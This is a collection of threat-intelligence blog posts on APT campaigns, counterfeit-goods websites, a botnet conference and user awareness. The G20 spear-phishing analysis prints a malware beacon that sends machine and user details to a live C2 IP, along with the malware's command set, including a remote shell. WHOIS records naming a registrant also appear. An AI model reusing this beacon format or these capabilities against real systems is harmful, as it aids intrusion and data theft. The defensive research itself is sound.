Cedric PERNET - Threat Intel, APT & Cybercrime

Hello,

Petit post blog pour faire un peu ma promo, j'avais oublié de signaler certaines publications ici...

MISC 85 : un article "APT - Qui sont les attaquants" qui décrit un peu les différents types de profils présents dans les équipes d'attaquants APT.

MISC 86 : un article "Simulation d'attaque APT", qui décrit pourquoi et comment mettre en oeuvre des simulations d'attaques APT. Ces simulations sont souvent bien plus efficaces pour sensibiliser une population en entreprise.

Je viens de finir d'écrire un nouvel article pour MISC, et tenez-vous bien, il ne parlera pas d'APT cette fois-ci ;-)

La suite en Septembre donc, pour ce qui est des articles MISC en tout cas ;-)

Following my first research paper about the Rocket Kitten APT threat actor, I have released another one, this time as a collaboration work with one researcher from ClearSky.

The blog post is here: Rocket Kitten Spies Target Iranian Lecturer and InfoSec Researchers in New Modus

The full paper is here: The Spy Kittens Are Back : Rocket Kitten 2

Un petit post rapide pour vous signaler que j'ai publié dans le dernier numéro de MISC Magazine un article intitulé "APT 101" qui présente les notions de base des attaques APT. L'exercice n'était pas forcément facile après avoir écrit un livre sur le sujet...

Le numéro 79 de MISC est présenté ici, sur le site de l'éditeur.

A noter au passage que ce numéro contient 4 articles sur les attaques APT, dont un excellent article de David Bizeul & Xavier Creff (Threat Intelligence et APT), un article sur le tristement célèbre malware PlugX écrit par Fabien Perigaud, ainsi qu'un article "APT au combat : stratégie numérique en réseau d'entreprise" écrit par William Dupuy & Nicolas Guillermin.

Un numéro à lire de toute urgence ! :-)

Hi all,

Here is my first research paper done for my new employer, Trend Micro.

I hope you'll enjoy it ! :-)

The blog summary I wrote about the paper is here, while the complete paper can be found here.

C'est avec un plaisir non dissimulé que je blogge ici pour vous faire part de la publication de mon premier ouvrage aux Editions Eyrolles, intitulé "Sécurité et espionnage informatique - Connaissance de la menace APT et du cyberespionnage".

Le livre est disponible en précommande sur le site d'Amazon.fr, et sera publié et disponible en FNAC à compter du 12 décembre.

Il m'aura fallu pas loin d'un an et demi de travail de nuit et le soutien de nombreuses personnes pour mener ce projet à son terme. Je remercie chaleureusement tous les gens qui m'ont aidé et soutenu, la liste serait trop longue mais ils sont remerciés en détail dans le livre ;-)

J'espère donc que cet ouvrage vous sera utile, que sa lecture vous sera agréable, et que vous me ferez un petit feedback ?

Merci à tous/toutes ! :-)

Cédric.

Well, as you probably know, I am french. Some of my friends do not agree, and say that I am not a real french, because I do not like strong cheese, I do not like eating ducks (in any way), and all wine tastes the same for me, in opposite to beer. Also, I hate european football, but loooooove american football, my favorite team being the Patriots from New England.

On the other hand, I must admit I have a little kink for american football team's jerseys. I already have one from the Patriots, yet I wanted one from the Miami Dolphins.

So here I am, googling to find a new jersey at an attractive price, in french language.

Using a simple request like "jersey miami dolphins pas cher" which means "jersey miami dolphins cheap" in Google, I get the following as first result:

As you can see, the first results are from "Google Shopping" and do provide links to legitimate websites like nike.com.

Then, more interestingly, I get results from Google Image. The first image shown, on which my mouse pointer is, leads to a domain named maillot-foot-nfl-nba.com.

Following this link, I get a nice page from an online store showing me the jersey of my dreams:

At this point, there are several little details which should raise suspicion for anyone:

• At the top of the web page, there's a line "Vente de DIR_WS_SEO_KEYWORD" which looks very ugly and unprofessional. Would a real seller really keep this ugly line up there ? Probably not.
• Look at the price !!! 69% discount on that product !!! It brings the price from 99€ (which is quite the usual price for that product) down to 30.99€.
• Bad language. I am writing this blog post in english and showing french stuff, ok, but I can tell you that if you go to any page of the web site, you'll see loads of spelling mistakes and even sentences which do not mean anything. The "general conditions" page is a must-read for french people, it is full of language problems.

Clicking on some of the general pages of the web site is quite instructive. In the middle of the description for shipping, written in french, some spanish can be seen: "Aceptamos Visa, Mastercard, Paypal y tarjeta de crédito!" ...

There can only be one conclusion to all of this: this website is fraudulent, selling counterfeit products, and no one should buy products there.

Now if I come back to my Google research, and look at the Google image links on the right of the one I followed, the domains are:

• www.boutiquesprofr.com
• www.forschungsinfo.de
• www.giacche.eu

By carefully watching these websites (except for forschungsinfo.de, which to clarify is a real site which has just hosted links to a fraudulent one, and the link has been removed), we could come to the same conclusion: counterfeit products are sold there.

Now one might think that these websites are build up by isolated fraudsters looking for easy money. The reality is a bit different, and that's why I am blogging, I wanted to bring some more insight to this kind of fraud and raise some awareness for people on Internet.

For starters, once again if you look carefully at all pages from such a website, you can find something more interesting than spelling mistakes: links to other websites.

Reading the "shipping info" from boutiquesprofr.com for example, the first line mentions that "sacmiumiu.com offre la livraison gratuite" , which means that "sacmiumiu.com offers free shipping".

Why the hell is a website called sacmiumiu.com mentioned in the shipping info of boutiquesprofr.com (which by the way means "prostorefr.com") ?

Well, the reason for that is that fraudsters do not build a single website to sell counterfeit products. They do build LOADS of different websites. You might think it takes a lot of time to do it, but it takes less than one or two hours to do. These fraudsters do use websites templates, which they just slightly modify from one site to the other. From the single sentence found on boutiquesprofr.com, we can expect it to use almost the same template as sacmiumiu.com.

sacmiumiu.com does not exist anymore, yet just by googling this name you would find interesting stuff : ads for it in guestbooks showing links to other counterfeit products websites, etc... Looking for it on archive.org, a website which shows past versions of websites, you would even find that the website has indeed been transfered by judge decision to Louis Vuitton because it was selling counterfeit products.

So, with few googling and wise use of archive.org, we already found out that our guys from "boutiquesprofr.com" were somehow connected to "sacmiumiu.com".

What else can be found ?

Let's go back to the first website I found, maillot-foot-nfl-nba.com.

At the top left part of the website, a logo from the company "NEW ERA" is visible. Let's be a bit clever and use it to find other websites which contain the exact same logo. To do that, we can save the logo from maillot-foot-nfl-nba.com and then submit it to a Google Image search. By doing that, Google will show us all referenced websites which contain the same picture :

Note: what you do not see in the screenshot is the fact that Google Image offers results showing images which are "close" to the image you submit. We need to focus on the exact same image, to avoid false positives. Moreover, if the fraudsters took the image from a legitimate website and did not modify it, we will get false positives we need to remove from the analysis.

Once again, the results are quite interesting: we easily fall on several fake products sellers.

This provides us a very easy method to group fake websites.

Ok, what do we know now ? We know that there are hundreds of websites selling fake products, using more or less the same templates and techniques.

How about having a look at the people who register these domain names ?

Let's have a look at the Whois information for our favorite website, maillot-foot-nfl-nba.com.

Registrant Name: mingsheng zheng
Registrant Organization: zhengxiansheng
Registrant Street: haikoulu10
Registrant City: haikou
Registrant State/Province: hainan
Registrant Postal Code: 570100
Registrant Country: CN
Registrant Phone: +86.13800000000
Registrant Phone Ext: 
Registrant Fax: +86.13800000000
Registrant Fax Ext: 
Registrant Email: registrar@mail.zgsj.com
Admin Name: mingsheng zheng
Admin Organization: 
Admin Street: haikoulu10
Admin City: haikou
Admin State/Province: hainan
Admin Postal Code: 570100
Admin Country: CN
Admin Phone: +86.13800000000
Admin Phone Ext: 
Admin Fax: +86.13800000000
Admin Fax Ext: 
Admin Email: capsshopnet@gmail.com

Once again, this really does not look like Whois information a legitimate merchant would use: the phone numbers seems to be fake, and the e-mail address is on gmail.com, yet this is very interesting for us in terms of investigation.

So, by doing some reverse whois researches, we can find 23 domains, additionally to maillot-foot-nfl-nba.com, which have been registered by capsshopnet@gmail.com :

Oh my, our friend "capsshopnet" has counterfeit stuff in french, spanish, and german, what a great linguist, this might explain all the spelling mistakes on these websites ;-)

What about the hosting ? Well, maillot-foot-nfl-nba.com is currently hosted on 223.26.62.200, which belongs to:

inetnum:        223.26.62.0 - 223.26.62.255
netname:        SUN-HK
descr:          Sun Network - DataCenter Service
                TRANS ASIA CENTER, KWAI CHUNG
country:        HK
admin-c:        DA179-AP

Let's look at some Passive DNS information. Which other domains have lead to this precise IP address currently or in the past ?

The results are other counterfeit products websites (except for kkk345.com which is about pornographic stuff)

kkk345.com
www.kkk345.com
www.gorras-obey.com
gorrasbaratas.com
www.gorrasbaratas.com
maillot-pascher.com
www.maillot-pascher.com
zapatos-baratas.com
www.zapatos-baratas.com
www.maillot-foot-nfl-nba.com
www.kkk3.org

Now let me please represent all this data in a structured form (click to enlarge):

I will end this blog post here. I just wanted people to be a bit aware that the underground of counterfeit products is huge, and that few minutes of investigation can lead to the discovery of a complex web of Internet websites run by fraudsters.

One might wonder about the number of people involved in that kind of fraud. There are probably several people to register the websites, several people to build the content (and we can be pretty sure some other people are selling the web pages templates), to handle the orders, to manufacture the products (probably hundreds/thousands of people here), etc.

I stopped my investigation at this point, because it was done on a rainy night at home. A lot is uncovered here: I did not look for every domain whois, I did not look for all the hosting data and IP ranges, I did not really search for any real person attribution.

By digging more on all these data, we could probably find much more fake products websites and persons involved, but once again, my goal here was just to raise awareness on a kind of fraud and describe it a bit.

So what have we learned here ?

• There are people probably working fulltime on registering websites, building websites (and people making/selling templates), having them indexed on Google and other places (black SEO), to sell counterfeit products coming mostly from China (that's what you discover when you order something), all of this in several different languages.
• Dozens of websites are handled by the same people
• These people do sell every kind of products you can think of: fake jerseys, fake tshirts, fake caps, fake shoes, fake handbags, fake sunglasses ... (you can guess it looking at the domain names from the previous image)
• The fraud is obvious when you take the time to really analyze the content a bit. You should NEVER BUY A PRODUCT WHICH LOOKS AMAZINGLY CHEAP, or from a website with loads of spelling mistakes.

Thank you for your reading, this was some kind of fun post blog I've done in a hurry last night. See you soon ! :-)

The french computer security landscape is not very known for its ability to communicate and organize huge computer security events. This might change, seeing the recent BOTCONF conference, which was held on the 5-6th December 2013 in Nantes, France. This conference had been awaited by the whole french computer security community for quite long and I can tell you it was worth waiting for.

BOTCONF is the "1st Botnet Fighting Conference" as it describes itself. The schedule for the conference, published some time before the actual conference, was already quite a nasty bit of a teaser, showing awesome presentation titles.

I have to say I have not been disappointed by the content, which I will describe later. It was very good, and showing how international the conference was. Yet the best part of BOTCONF was probably the social networking around it. As the official @botconf Twitter account mentioned, there were 23 countries at BOTCONF. Be it the pauses between presentations, the lunch, the official dinner, everything was done so that everyone would spend all their time together and talk. It was a great occasion to meet a lot of partners and friends, in a very nice place.

The organizing committee of this conference is the International botnets fighting alliance / Alliance internationale de lutte contre les botnets (AILB-IBFA), a not for profit organization registered in France and lead by Eric Freyssinet (@ericfreyss).

Just to say a quick word about the organization: it's been amazing. Some of you might know the pain and work it takes to organize such an event, yet the BOTCONF organizers have done it like they had done it fifteen times before. They even managed to stream most of the presentations in real time, which was very nice for all the people who could not attend the event. Congratulations dudes, you have done a great job !

Now for the content of the presentations. I will be very short, almost all of the material has been published on the schedule page of the event.

• Preliminary results from the European antibotnet pilot action ACDC. Integrating industry, research and operational networks into detecting and mitigating botnets

This presentation was done by Ulrich Seldeslachts, Managing Director of LSEC. The presentation was about the ACDC project, a collaboration of 28 partners in 14 European member states. For those about to Rock, ACDC stands for "Advanced Cyber Defence Centre". The goal of ACDC is to integrate the industry, research centers and operational networks together to improve the fight against botnets, from the detection to the mitigation. More information about this project can be found here and here.

As my good friend @xme mentioned in his excellent blog post about the event, "The biggest message passed to the audience was: “We need your help!”"

• Advanced Techniques in Modern Banking Trojans

This presentation was done by Thomas Siebert, Manager System Security Research from GDATA.
Thomas showed us how a banking trojan worked and how it could bypass two factor authentication. Bankpatch trojan was shown as an example, together with Feodo+SmsSpy and URLZone. Next focus was put on browser hijacking techniques, on 64bits systems and on Chrome hooking difficulties. BankGuard, an antihook solution from GDATA was also exposed. Thomas finished his speech by talking about more recent C&C structures: BankPatch, ZeuS P2P (GameOver) and Tor trojans.

• Spam and All Things Salty: Spambot v2013

Presentation done by Jessa Dela Torre, Senior Threat Researcher at TREND Micro.
Jessa's goal here was to provide us with information about spam campaigns which uses various compromised CMS (mostly Joomla and Wordpress, very few Drupal) as a way to send spam. On most of these compromised servers, some C99shell or WSO panels were found, to ease tasks for the cybercriminals. Since mid-April 2013, Jessa found approx. 240 000 compromised websites, each sending an average of 1497 spam on a single date.

• Distributed Malware Proxy Networks

Presentation done by Nick Summerlin (iSIGHT Partners) & Brad Porter (Internet Identity).
They reminded us that cybercriminals do use a lot of proxies to protect their identity and anonymity on Internet. Different proxy networks (Kol, Mango, Fluxxy as they named it) were shown, as well as ways to detect them.

• Legal limits of proactive actions: Coreflood botnet example (short talk)

Presentation done by Oğuz Kaan Pehlivan about the legal difficulties of fighting botnets. Example taken is the Coreflood case. While cybercriminals do not follow any rules except theirs, security researchers and all the botnet fighters must act according to the law, which makes it much more difficult, often on the edge between legal and not legal.

• Back to life, back to correlation (short talk)

Presentation done by Vasileios Friligkos, Security consultant at Intrinsec. This short talk was about detecting botnets by using certain indicators of compromise (IOC). The goal is to stop relying on usual signatures to focus on behavioral anomalies. To do this, one needs to collect a lot of data (from the network, from the hosts) and have efficient ways to analyze it. A very interesting talk which would have deserved much more time at BOTCONF.

• Using cyber intelligence to detect and localize botnets (short talk)

Presentation done by Enrico Branca. Enrico started by saying that he didn't trust Python low level libraries and coded his own, with two friends. Then he would use it to do some heavy analysis on legitimate traffic from Internet to find botnets and malware activity.

• Zombies in your browser

Presentation done by Himanshu Sharma and Prakhar Prasad. As the name says, this presentation was about cybercriminals abusing browsers to do their dirty deeds. A focus was made on add-ons, reminding us that we should always be very careful when adding new plugins to our favorite browser. Some demos ended the talk.

• Spatial Statistics as a Metric for Detecting Botnet C2 Servers

Presentation done by Etienne Stalmans, Security Analyst at SensePost. I have to say I found this presentation fantastic. The goal for the researcher was to find an accurate, lightweight, fast way for detecting botnet traffic, without prior knowledge. Focusing on fast-fluxed botnets, he showed something very simple yet very clever: fast-fluxed C&Cs have domain resolution leading to several A records, but they're "geographically speaking" very far. Usual "legitimate fast-flux domains" do have IP addresses which are usually very close, or in the same country. Botnet herders do not care about this, and this can be detected easily. The author also showed other classifiers, which you can read about in his slides and paper.

• The Home and CDorked campaigns : Widespread Malicious Modification of Webservers for Mass Malware Distribution

This presentation was done by Sébastien Duquette, malware researcher at ESET Canada. Sébastien showed us two "mass malware infection" attacks known as "Home" and "CDorked" campaigns. This presentation was very interesting and reminds us that attackers compromise more and more of Linux web servers to spread malware.

• Malware Calling (short talk)

This short talk was given by Tomasz Bukowski, Maciej Kotowicz and Lukasz Siewierski from the CERT.pl team. Their talk was about PowerZeuS, the famous trojan. At the time of writing, the slides and paper presenting this work have not been put online, but you can read this paper from these researchers.

• DisAss (short talk)

This short talk was done by Ivan Fontarensky, security expert and reverse engineer at CASSIDIAN CyberSecurity. The goal was to announce the release of one of his software into the open-source world. DisAss is a framework dedicated to automate various reverse engineering tasks. It makes it easier to extract interesting data from malware.

• Efficient Program Exploration by Input Fuzzing (short talk)
  

Short talk given by Thanh Dinh Ta, CNRS-INRIA researcher. The goal here was to fuzz malware in order to find all their hidden features. While it might sound very interesting, the slides showed far too much assembly code and lost a lot of people in the crowd.

• The power of a team work – Management of Dissecting a Fast Flux Botnet, OP-Kelihos “Unleashed” (short talk)

This presentation was done by Hendrik Adrian and Dhia Mahjoub from the famous @MalwareMustDie team (pictures?). MalwareMustDie has done a hell of a job on Kelihos botnet and obtained great results, which they wanted to share with the community at BOTCONF (pictures?). They showed the technical aspects of the Kelihos botnet (pictures?), before switching to their investigation and the disclosure of a lot of information about its author. (pictures?) Hendrik and Dhia showed us that such a team work can bring awesome results, and more efforts like this one should be done in the future ! (pictures?)
The presentation was breathtaking, it could have been longer and... well... MalwareMustDie tshirts are excellent ;-)

• Perdix: a framework for realtime behavioral evaluation of security threats in cloud computing environment

Presentation done by Julien Lavesque from ITrust. Based on the observation that behavorial analysis is nearly impossible in the cloud, ITrust decided to develop a framework to collect and analyze cloud data. Some examples have been shown, where the solution could detect one phpBB vulnerability, one IRC communication, one data exfiltration, and some network scanning.

• Participatory Honeypots: A Paradigm Shift in the Fight Against Mobile Botnets

This presentation was done by Pasquale Stirparo (European Commission). Pasquale started by reminding us that malware on smartphone is mostly on Android (79% of all mobile malware) and grows fast (1K new samples a day). Pasquale then showed differences between "normal" and mobile botnets, and underlined several problems with the mobile botnets (SMS is still a huge infection vector and we cannot block SMS, most mobile phones are up 24/7 so it can be used for DDoS/spam, etc.). Therefore, it is a good idea to build a participatory honeypot to share good information about these threats.

•  My name is Hunter, Ponmocup Hunter

This presentation was done by Tom Ueltschi, Cyber Security Expert at Swiss Post. Tom provided us with a great presentation of all his work around the malware named Ponmocup. By the way, speaking of naming, Tom showed us that malware naming from various antivirus companies was tough on this malware family. Tom's presentation from BOTCONF is not available at the time of writing but you can find a very close version here. This presentation has been very interesting and could have lasted for longer. Tom is a great speaker and we really enjoyed his humble way of presenting his results. Tom spoke about the way he started investigating on that malware family, before diving in the technical details on the malware and investigating it.

• Reputation-based Life-course Trajectories of Illicit Forum Members

Presentation done by David Décary-Hétu, Senior scientist and lecturer at University of Lausanne, Switzerland. This presentation aimed to provide a new understanding of how individuals accumulate reputation by looking at an illicit forum where participants talk about botnets and buy/sell botnet-related services. To do so, David has collected data on forum members as well as their reputation level over a period of several months. The final goal would be to to create tools that would identify key players in the online criminal underground before they have reached their full potential.

• APT1: Technical Backstage

Presentation done by Paul Rascagneres (malware.lu). This presentation was about Paul's recent works around the Poison Ivy malware family. To make it short, Paul scanned some suspicious IP ranges for indications of Poison Ivy C&C and compromised them for research purposes. He did so by finding a vulnerability and developing an exploit for it. He also found another RAT (Remote Administration Tool) called Terminator while he was investigating. It is just a pity he was trapped in a Virtual Machine in the end, we would have loved knowing more about the attackers's environment and tools.

• Europol and European law enforcement action against botnets

Presentation done by Jaap van Oss from the European Cybercrime Centre (EC3).The goal here is to build a cross-border coordination, between providers, researchers, law enforcement, experts, on active cybercriminal groups (their roles, modus-operandi, events, etc).

• A General-purpose Laboratory for Large-scale Botnet Experiments

Presentation done by Thomas Barabosch from Fraunhofer. Thomas showed us the results of his researches on creating a large laboratory for botnet experiments. To be short, he showed us the lab he built to create a botnet made of 1500 virtual Windows XP machines.

• DNS Resolution Traffic Analysis Applied to Bot Detection

Presentation done by Ronan Mouchoux. This presentation has been very impressive. Ronan showed two tools: MalwareTrap, which is made of a serie of scripts to detect, alert, and build statistics about infections, and DomainTrap. DomainTrap is amazing: it allows to detect botnet C&Cs in DNS logs, as long as the domain name has been generated by a DGA (Domain Generation Algorithm). Based on the idea that DGA domain names are human unreadable and human unpronounceable, Ronan build up a solution to raise alerts in these cases, with the help of some additional mathematics. Very clever.

• Exploit Krawler: New Weapon againt Exploits Kits

This presentation was done by Sébastien Larinier and Guillaume Arcas, both working at Sekoia. They showed us the framework they have built to detect exploit kits and their behavior, and download the malware associated to it. They showed the limits of a manual collecting method (run a VM, launch a vulnerable browser, go to the infecting URL, etc.) and decided to build an automated tool to do that, based on several virtual machines.

• BladeRunner: Adventures in Tracking Botnets

Presentation done by Jason Jones from Arbor Networks. Jason discussed the monitoring mechanisms they have, and showed botnet family case-studies, highlighting results they have obtained from their system. Jason concludes by offering a toolkit which allows others to conduct similar investigations (code not available at the time of writing).

• The hunter becomes the hunted – analyzing network traffic to track down botnets

Presentation done by Thomas Chopitea, Incident Handler at CERT Societe Generale. Thomas showed his tool named Malcom to the crowd. The goal of this tool is to find actionable intelligence, optimize time spent on the case, and have a good visualization tool. The tool is available online.

This concludes my quick write-up about the BOTCONF conference. Sorry for the delay, I've been quite busy these days. Once again, I want to thank and salute all of the organization staff. They have done a great job, and I bet everyone who's been there will probably go to the next edition of this event.

At last, I would like to send a particular warm hello and thank you to all the people I've met there. It was a great pleasure seeing you guys. Hope we will meet again at next BOTCONF, which, as the rumor spreads, will probably be held in another part of France ;-)

... And please allow me sending a special greeting to the SECURITY DRUNKYARDS. You know who you are ;-)

La sensibilisation est probablement l'activité qui nécessite le plus d'énergie en matière de sécurité informatique. Pour comprendre le risque, il faut déjà avoir un minimum de connaissance informatique.

Au fur et à mesure des dernières années, l'utilisateur lambda a été plus ou moins sensibilisé à:

• Disposer d'un anti-virus à jour

Cette recommandation a été tellement rabachée à l'utilisateur qu'il croit aveuglément que son anti-virus le protègera de toute menace, ce qui est totalement faux. La sensibilisation, c'est aussi de lui dire que son anti-virus aura toujours du retard par rapport aux nouveaux malware, et qu'il ne fera que détecter des menaces connues. Lui rappeller que plus de 100 000 souches de malware sont publiées chaque jour n'est pas forcément un bon argument d'ailleurs, ça lui fera plus peur qu'autre chose.

• Disposer d'un firewall

... Mais ne t'en fais pas, ton Windows dispose d'un firewall, et gère tout, tu n'as pas à comprendre ce que c'est. Encore un fail...

• Mettre à jour toutes ses applications

... Mais quand une pop up sort de nulle part pour dire: "vaz y,install-moi, je une nouvlle mis a jour d'Adobe Reader", que fait l'utilisateur ? *click*

• Ne pas ouvrir des mails venant d'inconnus

Cette recommandation, pourtant bonne à la base, doit être accompagnée d'une sensibilisation sur les malware et leur mode de fonctionnement. "Je ne comprend pas, quand j'ai ouvert le PDF qui avait l'air super, l'ordi a montré un PDF, ça ne peut pas être un virus !" ...

• Ne pas ouvrir de pièces jointes "louches" venant de personnes connues

La sensibilisation au spear phishing ne peut être qu'un échec avec les particuliers. Même en entreprise, c'est compliqué.

• Ne pas naviguer sur des sites pornographiques

Cette recommandation est inutile, parce que les cybercriminels infectent maintenant des sites légitimes, afin de propager des malware et infecter nos pauvres utilisateurs.

• Ne pas effectuer d'achat en ligne sur un site "louche"

En gros, tu n'achèteras plus que chez Darty ou... La Redoute.

• Se méfier comme de la peste de tous les méchants qui sévissent sur "Le Bon Coin".

Cette recommandation que j'ai déjà entendue fait sourire. Comment un utilisateur ferait-il la différence entre un escroc et une personne honnête sur ce site ? Un des résultats de cette recommandation est que certains utilisateurs n'effectueront aucun achat sur le site.

• Ne pas connecter une clef USB que tu ne connais pas à ton ordinateur

... Mais comment réagir, lorsque par courrier POSTAL on reçoit ça :

Alors là, je dis merci, merci La Redoute, mille fois merci, tu es le premier maillon d'une chaine qui sèmera encore plus de confusion chez les utilisateurs, et qui permettra à certains cybercriminels de profiter de la crédulité des utilisateurs.

Habituer l'utilisateur à connecter un dispositif USB d'une source inconnue est tout sauf une bonne chose. Qu'est-ce-qui lui garantit que le courrier vient bien de "La Redoute" ? Le joli papier coloré estampillé du logo de la société ? Le fait qu'il y ait écrit "La Redoute" partout ?

Leur courrier ne contient même pas de référence client, c'est un courrier envoyé en masse à tous leurs abonnés...

La prochaine étape, vous l'avez compris, consistera pour certains cybercriminels à envoyer de faux courriers de toutes les sociétés crédibles de démarchage à domicile, dans le but de leur faire ouvrir un certain fichier... Qui sera bien sûr un malware.

Vous me direz que c'est fournir bien des efforts pour infecter quelqu'un avec un malware bancaire, par exemple, et que les fraudeurs ont d'autres méthodes beaucoup plus faciles. Evidemment. Quid d'attaques ciblées, par contre ?

Cette chère Madame Dupont, qui travaille dans une société sensible sur des technologies de pointe, ne devinera jamais que son ordinateur personnel s'est fait poutrer parce que sa femme voulait voir ce que "La Redoute" lui envoyait...Et que son compte mail a été compromis pour spear phisher ses collègues, puis compromettre tout le système d'information de la société... Mais ça, bien sûr, ça n'arrive jamais ;-)

EDIT: En fait, le dispositif USB fourni par La Redoute n'est pas un support de stockage USB: c'est une webkey USB HID qui, une fois insérée, simule un clavier, lance le navigateur en faisant un "touche Windows+R", tape l'URL de destination et s'y connecte.

L'URL en question est http://secure-ctw.com/dp

Cette URL mène à une page légitime de La Redoute.

En résumé, La Redoute envoie par La Poste à tous ses clients un dispositif ayant un comportement hautement intrusif et potentiellement dangereux. Pour les petits curieux, si on change le "/dp" de la fin de ce lien, on peut voir d'autres clients de secure-ctw...

Enfin, le dispositif USB ne mène même pas directement vers La Redoute, mais vers un tiers... Imaginez ce qui se passerait si ce tiers était compromis et propageait du malware.

On a recent blog post, Claudio Guarnieri analyzes an APT attack campaign launched by the "Calc Group".

This group of attackers used the soon-coming "G20 Summit" to spear phish their targets. which are mostly financial institutions and governments. The attack in itself is really not sophisticated, it is just made of an archive file (.ZIP) containing a malicious executable file (.EXE).

The names of the zip files are:

• G20 Briefing Papers.zip
• G20 Summit Paper.zip

These archives contains the following files:

• G20 Discussion Paper.exe
• GPFI Work Plan 2013.exe
• G20 Summit Improving global confidence and support the globa.EXE
• Improving global confidence and support.pdf.exe
• The list of NGOs representatives accredited at the Press Center of The G20 Leaders' Summit 2013.pdf.exe

One might be surprised that people really do open such zip files and click on these executables, but believe me, some people still do. Once again, it shows us that it is not necessary to deploy brilliant strategies to infect people with targeted malware.

Claudio makes a great analyse of these attacks in his blog post, so I won't write about it and let you read it instead. Now what I wanted to know was what happened next. I was especially interested in the second attack, because it had been submitted to Virus Total (VT) from France.

To summarize Claudio's analysis, the attack scheme goes like this :

• The victim gets the zip file, opens it, and executes the malicious executable.
• The executable shows a decoy document (PDF) about the G20 or such.
• The executable starts keylogging and downloads more malware.

This last point is very important to me: what malware is downloaded, and why? (the "why" can be expected though...)

To quote Claudio, "these samples are just an initial stage of a larger suite of malware, possibly including Aumlib and Ixeshe, which it will try to download from a fixed list of URLs embedded in the binary".

Luckily enough, the second stage malware was still available and I could download it for analysis. It turns out that it is not an "AumLib" or an "Ixeshe", but a variant of a less known malware, called "Bisonha" by the malware researcher's community.

To bypass anti-virus and IDS/IPS products, it is downloaded "upside down" (the first byte becomes the last byte, etc.) and written locally as a regular executable once it is downloaded successfully, then executed.

The file shows a "Java" icon, to try to look more "legitimate" to users. At the time of writing, the sample I downloaded had not been submitted to Virus Total, so I did. The detection rate for this sample is 12/46.

This malware has no persistence mechanism (the first stage downloader makes it persistent), and once executed starts communicating with an IP address 23.19.122.196 on port 443:

GET
/300100000000F0FD1F003746374637433731333433363334333600484F4D45000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000070155736572000000000000000000000000000000000000000000000000000000000000000000006444000000000000000000000000000000000000000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 23.19.122.196
Connection: Keep-Alive
Cache-Control: no-cache

As you can see, the network traffic is on port 443 (HTTPS) but it is definitely no HTTPS traffic, rather hex-encoded data:

0000000: 0000 0000 f0fd 1f00 3746 3746 3743 3731  ........7F7F7C71
0000010: 3334 3336 3334 3336 0048 4f4d 4500 0000  34363436.HOME...
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000050: 0000 0000 0000 0000 0007 0155 7365 7200  ...........User.
0000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000080: 0064 4400 0000 0000 0000 0000 0000 0000  .dD.............
0000090: 0000 0000 0000 0000                      ........

My reverse engineering rockstar friend Fabien Perigaud had a closer look at the malware and provided me with more information:

Offset: 0x4: RAM size in kilobytes
Offset: 0x8: Hard-drive ID, xored with the machine name then hex-encoded
Offset: 0x19: Machine name
Offset: 0x59: Operating system version (in malware author's writing)
Offset: 0x60: Number of processors
Offset: 0x61: User name
Offset: 0x81: A unique identifier (probably used as a campaign identifier?) - Here it is "dD" but other two characters identifiers have been witnessed in the wild.

The commands which can be sent to the malware are sent in answer:

3004: File writing
3005: File reading
3006: Writing and execution of a file

3115 : provide a shell

3222 : write a new ID in %APPDATA%\recycle.ini 
3223 : auto deletion of the malware
3224 : update

This quick analysis shows us that no matter how deep your knowledge is about an attacker, you're never safe from seeing him change his methods completely. That is why APT attacks attribution is such a hard task.

Thanks to Fabien, Jesse, Brian and Ned for the help while writing this small post ;-)

EDIT: (2013/09/04) Satnam Narang from Symantec just posted interesting material about the same APT campaign. You can read it here. In few words, Poison Ivy RAT is also in the game ;)

Un peu plus de 2 mois ont passé depuis la publication du rapport de Mandiant sur APT1, il est donc temps de faire un petit point sur la question qui hante beaucoup d'esprits : les attaquants APT1 ont-ils changé leurs méthodes suite au rapport Mandiant ?

Le site CyberSquared.com nous apporte un bon début de réponse sous la forme d'un billet sur leur site. CyberSquared indique se baser sur une seule source, mais leurs propos sont néanmoins très intéressants.

Je précise à nouveau que mon but ici n'est pas d'analyser ces informations mais simplement de vous fournir une petite synthèse en français, ce qui manque cruellement dans la blogosphère française :-/

Autant répondre à la question introductive de ce billet tout de suite : APT1, également appellé "Comment Crew", a finalement changé très peu de choses dans ses opérations de maintien sur des systèmes compromis. Les domaines utilisés comme serveurs de c&c sont toujours les même, la technique n'a pas changé, et les malware ont peu évolué. A peine un changement de clef de chiffrement par ci par là, mais cela fait partie de la vie habituelle d'une famille de malware.

Voici ce qui m'a semblé plus intéressant dans ce billet :

• Cybersquared a découvert un serveur HFS qui servait à APT1 pour stocker du matériel d'attaque. En l'occurence, un fichier zip contenant un malware connu, cité dans le rapport de Mandiant, légèrement modifié, présentant un icône de document PDF, droppant un fichier PDF de diversion. Ce document de diversion est une invitation pour une conférence MODSIM 2013, une conférence plutôt intéressante pour des secteurs d'activité tels que l'industrie aérospatiale, la défense, etc.

La technique n'est pas nouvelle et habituelle pour ce groupe d'attaquants: infecter un poste en faisant croire à la victime qu'elle ouvre un document PDF. En fait, le binaire est exécuté, infecte la machine, et affiche un PDF réel.

• Un autre PDF se trouvait dans l'archive, PDF légitime dérobé lors d'une attaque APT. Il est intéressant de constater, et ce n'est pas la première fois selon Cybersquared, que les attaquants utilisent des documents réels dérobés auprès de certaines cibles, pour se donner une apparence légitime dans d'autres attaques.

• Une analyse sommaire de ce malware a été effectuée, je vous laisse la lire directement à la source.

Il me semble important de souligner qu'il existe des serveurs HFS dans la nature, qui hébergent du matériel d'attaque. Pourquoi stocker ce contenu en ligne et ne pas le conserver en local ? Probablement pour le partager plus facilement entre membres d'une équipe d'attaquants. Peut-être est-ce simplement la flemme (les geeks sont fainéants dirait le troll...) de créer des serveurs locaux non accessibles par Internet ? Ou alors est-ce parce que différentes personnes ne se trouvant pas au même endroit physique doivent y accéder ? Je penche pour la flemme d'attaquants se situant probablement dans un même batiment et stockant de la donnée accessible sur Internet sans vraiment s'en préoccuper.

